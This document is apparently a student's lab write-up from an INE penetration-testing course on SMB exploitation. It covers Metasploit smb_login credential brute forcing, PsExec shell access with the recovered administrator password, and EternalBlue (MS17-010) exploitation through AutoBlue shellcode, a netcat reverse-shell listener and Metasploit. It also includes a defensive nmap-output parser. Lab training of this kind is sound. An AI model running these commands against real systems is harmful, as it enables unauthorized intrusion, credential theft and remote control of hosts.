INE Training Notes - by syselement
🔬SMB - PsExec


Last updated 2 years ago


Lab 1


  • Target IP: 10.4.16.36

  • SMB exploitation

  • Dictionaries to use:

    • /usr/share/metasploit-framework/data/wordlists/common_users.txt

    • /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Enumeration

ping 10.4.16.36

nmap -sV -sC 10.4.16.36
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=EC2AMAZ-408S766
| Not valid before: 2023-03-11T17:43:37
|_Not valid after:  2023-09-10T17:43:37
|_ssl-date: 2023-03-12T17:47:48+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-03-12 23:17:49
|_  start_date: 2023-03-12 23:13:37

📌 SMB version 2.02

SMB Brute-force

    • Brute-force success depends on the user and password lists used: if the valid combination is not in the dictionaries, the scan finds nothing.

msfconsole
search smb_login
use auxiliary/scanner/smb/smb_login
set RHOSTS 10.4.16.36
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
exploit
[+] 10.4.16.36:445 - 10.4.16.36:445 - Success: '.\sysadmin:samantha'
[+] 10.4.16.36:445 - 10.4.16.36:445 - Success: '.\demo:victoria'
[+] 10.4.16.36:445 - 10.4.16.36:445 - Success: '.\auditor:elizabeth'
[+] 10.4.16.36:445 - 10.4.16.36:445 - Success: '.\administrator:qwertyuiop' Administrator

SMB Exploitation

    • Using this technique, no exploit is launched or uploaded on the target system.

    • It is a legitimate authentication with the actual credentials and the use of an official tool (psexec).

psexec.py Administrator@10.4.16.36 cmd.exe

    • This technique uploads and runs a (malicious) payload on the target. Pay attention to the antivirus!

msfconsole
search psexec
use exploit/windows/smb/psexec
set RHOSTS 10.4.16.36
set SMBUser Administrator
set SMBPass qwertyuiop
# Make sure the LHOST = your host IP address
exploit

  • Find the flag by running meterpreter commands

shell
# will provide a cmd shell on the target machine
cd \
dir
type flag.txt
Flag: 🚩

e0da81a9cd42b261bc9b90d15f780433


Lab 2 - Eternal Blue (Extra)

🔬 Home Lab

I have prepared a vulnerable Windows 2008 R2 Virtual Machine and connected it to the same network as the Kali virtual machine. On the server, I have activated the File Services role and created a shared folder with the Administrators Group.

  • Host system: Kali Linux

  • Target system: Windows Server 2008 R2 - IP 192.168.31.131 - Administrator:Eternal17010

Enumeration

nmap -sV -sC 192.168.31.131
sudo nmap --script smb-vuln-ms17-010 -p445  192.168.31.131
  • 📌 The system is vulnerable to CVE-2017-0143
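Both labs rely on reading Nmap's "Host script results" block by eye: in Lab 1 the smb2-security-mode script reported "Message signing enabled but not required", and here smb-vuln-ms17-010 reports the host as vulnerable. The following is an added example written for these notes, not code from the course or from Nmap: it parses that block into per-script findings so the two weaknesses (signing not enforced, and an unpatched SMBv1 vulnerability) are reported with a severity instead of being buried in the scan output. The smb2-security-mode and smb2-time lines in the sample are the Lab 1 output above; the smb-vuln-ms17-010 lines are a constructed approximation of Nmap's format for the Lab 2 host, not captured from it. The names Finding, parse_host_scripts and assess are my own.

```python
import re
from dataclasses import dataclass

# Constructed sample input. The smb2-security-mode/smb2-time lines are the Lab 1
# scan output; the smb-vuln-ms17-010 block is a constructed approximation of
# Nmap's output for the Lab 2 host, not captured from it.
SAMPLE_NMAP_OUTPUT = """\
Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-03-12 23:17:49
|_  start_date: 2023-03-12 23:13:37
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
"""


@dataclass
class Finding:
    script: str    # NSE script that produced the evidence
    severity: str  # INFO, HIGH or CRITICAL
    detail: str


def parse_host_scripts(text):
    """Group the lines of Nmap's 'Host script results' block by NSE script name.

    Nmap prints each script as '| <name>: ' (one space after the bar) followed by
    more deeply indented detail lines; '|_' marks the last line of a block.
    """
    scripts = {}
    current = None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                            # not part of a script block
        body = raw.lstrip("|_").rstrip()        # drop the '| ' / '|_' gutter
        header = re.match(r"^ (\S+):$", body)   # exactly one leading space => script name
        if header:
            current = header.group(1)
            scripts[current] = []
        elif current is not None:
            scripts[current].append(body.strip())
    return scripts


def assess(text):
    """Turn the parsed script blocks into prioritised findings for the host."""
    findings = []
    for name, lines in parse_host_scripts(text).items():
        joined = " ".join(lines)
        if name == "smb2-security-mode":
            if "not required" in joined:
                findings.append(Finding(name, "HIGH",
                    "SMB signing enabled but not required; enforce signing on the server"))
            elif "required" in joined:
                findings.append(Finding(name, "INFO", "SMB signing required"))
        elif name.startswith("smb-vuln-") and "State: VULNERABLE" in lines:
            cves = sorted(set(re.findall(r"CVE-\d{4}-\d+", joined)))
            findings.append(Finding(name, "CRITICAL",
                "unpatched: " + (", ".join(cves) if cves else "no CVE id in output")))
    return findings


if __name__ == "__main__":
    for f in assess(SAMPLE_NMAP_OUTPUT):
        print(f"[{f.severity}] {f.script}: {f.detail}")
```

The header regex relies on Nmap's indentation convention (one space after the bar for a script name, three or more for its detail lines), which is why "|   2.02: " is kept as a detail line of smb2-security-mode rather than starting a new block. For a real engagement, `nmap -oX` plus an XML parser is the more robust route; the text parser above is enough to show what the two script results actually mean for the host.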

Manual Exploitation

cd
mkdir tools
cd /home/kali/tools
sudo git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git 
cd AutoBlue-MS17-010
pip install -r requirements.txt

  • Generate the shellcode that will be executed on the target system.

cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh
# LHOST = Host Kali Linux IP
# LPORT = Port Kali will listen for the reverse shell

  • Set up a netcat listener on the specified port in another terminal tab

nc -nvlp 1234

  • In the AutoBlue terminal tab, run eternalblue_exploit7.py from the AutoBlue-MS17-010 directory to exploit the target

cd ..
chmod +x eternalblue_exploit7.py
python eternalblue_exploit7.py 192.168.31.131 shellcode/sc_x64.bin

  • Check the netcat tab for the reverse shell

Automatic Exploitation

msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.31.131
exploit

Lab tasks and references

  • Use Metasploit smb_login module to brute force SMB

  • Use PsExec.py script for Linux (from the impacket-scripts) to get a command prompt on the target machine, with the Administrator account.

  • Alternatively to the Python script, use Metasploit psexec module to get a meterpreter session on the target system.

  • Exploitation tool: AutoBlue-MS17-010

  • Vulnerability: CVE-2017-0143 - EternalBlue + CVE-2017-0144

  • AutoBlue-MS17-010 will be used for the manual exploitation